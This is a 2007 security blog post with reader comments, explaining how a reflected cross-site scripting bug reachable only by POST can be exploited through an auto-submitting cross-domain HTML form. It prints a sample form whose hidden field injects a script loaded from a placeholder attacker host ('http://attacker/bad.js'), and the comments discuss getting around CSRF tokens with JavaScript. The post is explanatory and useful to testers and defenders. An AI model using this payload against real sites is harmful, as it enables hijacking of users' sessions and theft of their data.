Thursday, March 29, 2007

Exploiting XSS in POST requests

One good question I was asked in Amsterdam was whether it is possible to exploit a reflected cross-site scripting bug that can only be triggered via a POST request. The answer, of course, is "yes".

There are plenty of delivery mechanisms for reflected XSS attacks, only some of which involve inducing a victim to click on a crafted URL. For example, an attacker can create an innocuous looking web page containing an HTML form with the required fields, and a script which auto-submits the form:

<form name=TheForm action=http://vuln-app/page.jsp method=post>
<input type=hidden name=foo value=&quot;&gt;&lt;script&#32;src=http://attacker/ bad.js&gt;&lt;/script&gt;>

Rather than creating his own web site, the attacker could of course inject the above attack into a third-party application via a stored XSS bug. The form is submitted cross-domain (as in a cross-site request forgery attack), but the resulting payload executes within the security context of the vulnerable application, enabling the full range of standard XSS attack actions to be performed.


Anonymous said...

Thanks a lot.
It helped me to prepare a PoC for one of my personal project.

Keep up the good work.!!!

Anonymous said...

This should not be exploitable if site has CSRF protection.

Anonymous said...

If the CSRF token is publicly available (Such as on a reg page) then it is still vulnerable as a token can be pulled with JS. Unless they tie tokens to IP.

Anonymous said...

sorry, newbie ask a question..

So to do XSS attack with POST method, we do this as a proxy (man-in-the-middle) to tamper the POST request sent to the user/client? and inject the code there? or how? please explain

Dafydd Stuttard said...

@Anonymous No, an active MITM attack doesn't need to exploit XSS since you can just directly manipulate responses. To exploit XSS via a POST request you use a form with a cross-domain action URL, as described in this blog post.